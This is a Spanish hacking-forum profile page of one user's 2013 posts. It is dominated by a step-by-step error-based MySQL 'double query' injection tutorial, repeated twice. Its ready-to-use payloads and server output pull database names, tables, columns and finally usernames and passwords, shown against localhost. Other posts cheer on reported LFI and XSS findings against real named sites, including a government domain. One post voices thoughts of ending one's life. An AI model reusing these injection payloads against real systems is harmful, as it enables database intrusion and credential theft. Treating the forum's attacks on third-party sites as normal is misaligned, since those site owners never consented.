Damn, pues tenias que especificar MySQL improved o injection.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Back-end / Re:evitar injeccion SQL
Enero 26, 2013, 09:20:33 PMCitar
en realidad lo más probable es que mysqli también sea bypasseable, PDO no se.
es cierto que toda la rama de mysql_ está deprecated y que se usa mysqli.
es que no me preocupo mucho por ese tipo de cosas, me manejo con una clase que se encarga de hacer las consultas, y utiliza mysqli desde la anteúltima versión.
saludos!
Que tiene que ver MySQL con MySQL(i)=MySQL Injection ?
#3
Back-end / Re:evitar injeccion SQL
Enero 26, 2013, 06:20:00 PM
Sabeis que mysql_real_escape_string ha sido bypass-eado ?!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 06:17:01 PM
Pero vamos a ver, tu no endiendes la diferencia entre Scanner y Scanning ?
#7
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 10:08:05 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Haciendo un scanner con Vegas de la distro Backtrack5 R3, a una web y me da 20 errores de Integer Overflow de riesgo alto. He buscado por google y por distintos foros, y solo encuentro vulnerabilidades de integer overflow en aplicaciones y eso pero nada de vulnerabilidades web.
Solo quiero informacion, o algun link por donde seguir buscando y aprender a explotar esa vulnerabilidad.
Saludos, Krraskl13.
Haciendo un scanner? Wtf?! Scanner es el programa con el que haces SCANNING.
Y, me parece a mi, o tienes informaciones en Vega cuando el SCANNER encuentra una vulnerabilidad IntegerOverflow?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#8
Hacking ShowOff / Re:LFI ENERGAS.GOV.AR
Enero 26, 2013, 07:21:01 AM
Ah, tenias que poner en la imagen ../algo/algo.algo. Porque asi no se entiende nada.
#10
Off Topic / Re:De que pais eres?
Enero 24, 2013, 11:25:17 AM
Eso de: "a nadie le gusta que le digan la verdad en la cara"
a mi no me lo digas, porque yo no soy ni de LatinoAmerica ni de Espana. [Pero tampoco en mi pais, no hay cosas mejores que en otros.]
a mi no me lo digas, porque yo no soy ni de LatinoAmerica ni de Espana. [Pero tampoco en mi pais, no hay cosas mejores que en otros.]
#11
Off Topic / Re:De que pais eres?
Enero 23, 2013, 02:49:24 PM
Tienes razon, pero si recibes informaciones negativas del pais X, te podra ayudar en el futuro esa informacion? Y si recibes informaciones positivas te podra ayudar aquella informacion en el futuro? Yo digo que si.
#12
Off Topic / Re:De que pais eres?
Enero 23, 2013, 02:38:46 PM
No os entiendo, porque poneis todas las tonterias que se hacen en un pais?! Que el gobierno es tal, que la policia hace tal. Pero a quien les importa? A mi no me importan las cosas negativas de otro pais, me importan las cosas positivas. Como han hablado varios de sus paises en la primera pagina de este topic, que comida tienen y tal tal tal. Pero las cosas negativas, para que las escribis? Creeis que va a cambiarse algo si las escribis? O creeis que nos importan las cosas Negativas?!
#13
Off Topic / Duda "personal".
Enero 23, 2013, 02:26:37 PM
Querias alguna vez, quitar la vida que la tienes ? Sentiste alguna vez, que todo el mundo se cae, y tu eres el responsable? Alguna vez en la vida te has dado cuenta que todo lo que haces lo haces mal?
[Se que este es un foro de informatica, pero quiero respuestas para esas preguntas.]
[Se que este es un foro de informatica, pero quiero respuestas para esas preguntas.]
#14
Off Topic / Re:De que pais eres?
Enero 22, 2013, 07:10:50 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo soy de México!
Y nosotros tenemos a los mayas, aquellos que hicieron una revuelta mundial jajaja
Saludos.
Pues vuestros Mayas son un poco cretinos.
#15
Hacking ShowOff / Re:XSS Bicicletas Astolfi.
Enero 20, 2013, 06:17:39 PM
F0M3T espero que traigas mejores vulnerabilidades, no vulnerabilidades en paginas como "inglesia de san cabron".
Salutti !
Salutti !
#16
Diseño UX/UI / Re:Cronos Vs. Kodeinfect [VOTACION]
Enero 20, 2013, 12:57:10 PM
Molan los dos, buen trabajo CRONOS y KODEINFECT.
#18
Hacking ShowOff / Re:XSS Bicicletas Astolfi.
Enero 20, 2013, 05:03:10 AM
Lo siento por decirlo, pero es una Mie**a de XSS, vamos quieres que ponga yo tambien XSS de "tiendas de calzoncillos" ?
El showoff esta lleno de XSS, cuando vais a poner un LFI ? un RFI? un SQLI ? un PCI? el researching no esta compuesto solo por buscar XSS y publicarlos.
El showoff esta lleno de XSS, cuando vais a poner un LFI ? un RFI? un SQLI ? un PCI? el researching no esta compuesto solo por buscar XSS y publicarlos.
#19
Wargames y retos / Re:Acceso a la WEB Facil
Enero 19, 2013, 01:01:13 PM
Saludos, prueba: No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Y connectate por el skype. ~_~
Y connectate por el skype. ~_~
#20
Bugs y Exploits / Tutorial MySQL Injection Double Query.
Enero 18, 2013, 09:24:06 PM
Saludos, os traigo otro tutorial de inyecciones. 
Hoy vamos a inyectar en localhost una inyeccion de tipo MySQL Double Query [2x error based].
Empezamos:
Paso 1:
Para sacar la version necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'DataBase Version==>'5.1.63-0ubuntu0.10.04.1'~1' for key 'group_key'
Paso 2:
Para sacar la bases de datos, necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e)) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'First DataBase ==> 'information_schema'~1' for key 'group_key'
La primera base de datos es "information_schema", como pasamos a la siguente? Pues con el siguente cambio del query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e)) from information_schema.schemata limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'Second DataBase ==> 'mysql'~1' for key 'group_key'
He creado una base de datos llamada "underc0de" con una tabela llamada "usuarios" dentro de ella hay unas columnas ==> id, username, password.
Como he creado la tabla con las columnas? Con el siguente query:
CREATE base.tabla (columna tipo, columna2, tipo, columna 3 tipo);
En mi caso es:
CREATE underc0de.usuarios (id varchar(20), username varchar(30), password varchar(50));
Despues he metido los en las columnas datos.
INSERT INTO underc0de.usuarios (id,username,password) VALUES ('1','WilyXem','underc0de');
Que es "varchar"?! Varchar es el espacio donde se pueden escribir los datos de una de las columnas, las cifras que vienen dentro de las parentesis son los datos que se pueden escribir [como maximo], osea, no puedes escribir en username mas de 30 palabras, ni en password no puedes escribir mas de 50 palabras.
Paso 3:
Volvemos a la inyeccion, ahora vamos a sacar las tablas de la base llamada "underc0de"
Para sacar las tablas necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) from information_schema.tables where table_schema=0xHex-de-la-base-de-datos limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'First Table ==> 'usuarios'~1' for key 'group_key'
Paso 4:
Para sacar las columnas necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(column_name as char),0x27,0x7e)) from information_schema.columns where table_schema=0xHex-De-La-Base-De-Datos limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'First Column ==> 'id'~1' for key 'group_key'
Para pasar a la otra columna, hay que hacer este cambio en el query:
and(select 1 from(select count(*),concat((select(concat(0x4669727374205461626c65203d3d3e20,0x27,cast(column_name as char),0x27,0x7e)) from information_schema.columns where table_schema=0x756e64657263306465 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'Second Column ==> 'username'~1' for key 'group_key'
Ya tenemos las 3 columnas:
id
username
password.
Paso 5:
Para sacar los datos de las columnas necesitamos el siguente query:
and(select 1 from(select count(*),concat((select (select(concat(0x7e,0x27,cast(tabla.columna as char),0x27,0x7e)) from base.tabla LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
Código: php
MySQL Fucking server says: Duplicate entry 'The first username ==> 'WilyXem'~1' for key 'group_key'
Y su contrasena es:
Código: php
MySQL Fucking server says: Duplicate entry 'The first password is ==> 'underc0de'~1' for key 'group_key'
Espero que os gusto el tutorial.
Gracias por vuestra atencion.
Hoy vamos a inyectar en localhost una inyeccion de tipo MySQL Double Query [2x error based].
Empezamos:
Paso 1:
Para sacar la version necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select(concat(0x44617461426173652056657273696f6e3d3d3e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'DataBase Version==>'5.1.63-0ubuntu0.10.04.1'~1' for key 'group_key'
Paso 2:
Para sacar la bases de datos, necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e)) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select(concat(0x4669727374204461746142617365203d3d3e20,0x27,cast(schema_name as char),0x27,0x7e)) from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'First DataBase ==> 'information_schema'~1' for key 'group_key'
La primera base de datos es "information_schema", como pasamos a la siguente? Pues con el siguente cambio del query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e)) from information_schema.schemata limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select(concat(0x5365636f6e64204461746142617365203d3d3e20,0x27,cast(schema_name as char),0x27,0x7e)) from information_schema.schemata limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'Second DataBase ==> 'mysql'~1' for key 'group_key'
He creado una base de datos llamada "underc0de" con una tabela llamada "usuarios" dentro de ella hay unas columnas ==> id, username, password.
Como he creado la tabla con las columnas? Con el siguente query:
CREATE base.tabla (columna tipo, columna2, tipo, columna 3 tipo);
En mi caso es:
CREATE underc0de.usuarios (id varchar(20), username varchar(30), password varchar(50));
Despues he metido los en las columnas datos.
INSERT INTO underc0de.usuarios (id,username,password) VALUES ('1','WilyXem','underc0de');
Que es "varchar"?! Varchar es el espacio donde se pueden escribir los datos de una de las columnas, las cifras que vienen dentro de las parentesis son los datos que se pueden escribir [como maximo], osea, no puedes escribir en username mas de 30 palabras, ni en password no puedes escribir mas de 50 palabras.
Paso 3:
Volvemos a la inyeccion, ahora vamos a sacar las tablas de la base llamada "underc0de"
Para sacar las tablas necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) from information_schema.tables where table_schema=0xHex-de-la-base-de-datos limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select(concat(0x5365636f6e64204461746142617365203d3d3e20,0x27,cast(table_name as char),0x27,0x7e)) from information_schema.tables where table_schema=0x756e64657263306465 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'First Table ==> 'usuarios'~1' for key 'group_key'
Paso 4:
Para sacar las columnas necesitamos el siguente query:
and(select 1 from(select count(*),concat((select(concat(0x7e,0x27,cast(column_name as char),0x27,0x7e)) from information_schema.columns where table_schema=0xHex-De-La-Base-De-Datos limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select(concat(0x466972737420436f6c756d6e203d3d3e20,0x27,cast(column_name as char),0x27,0x7e)) from information_schema.columns where table_schema=0x756e64657263306465 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
MySQL Fucking server says: Duplicate entry 'First Column ==> 'id'~1' for key 'group_key'
Para pasar a la otra columna, hay que hacer este cambio en el query:
and(select 1 from(select count(*),concat((select(concat(0x4669727374205461626c65203d3d3e20,0x27,cast(column_name as char),0x27,0x7e)) from information_schema.columns where table_schema=0x756e64657263306465 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select(concat(0x5365636f6e6420436f6c756d6e203d3d3e20,0x27,cast(column_name as char),0x27,0x7e)) from information_schema.columns where table_schema=0x756e64657263306465 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'Second Column ==> 'username'~1' for key 'group_key'
Ya tenemos las 3 columnas:
id
username
password.
Paso 5:
Para sacar los datos de las columnas necesitamos el siguente query:
and(select 1 from(select count(*),concat((select (select(concat(0x7e,0x27,cast(tabla.columna as char),0x27,0x7e)) from base.tabla LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Resultado:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select (select(concat(0x7e,0x27,cast(usuarios.username as char),0x27,0x7e)) from underc0de.usuarios LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'The first username ==> 'WilyXem'~1' for key 'group_key'
Y su contrasena es:
http://localhost/sqli2.php?id=1 and(select 1 from(select count(*),concat((select (select(concat(0x5468652066697273742070617373776f7264206973203d3d3e20,0x27,cast(usuarios.password as char),0x27,0x7e)) from underc0de.usuarios LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)MySQL Fucking server says: Duplicate entry 'The first password is ==> 'underc0de'~1' for key 'group_key'
Espero que os gusto el tutorial.
Gracias por vuestra atencion.
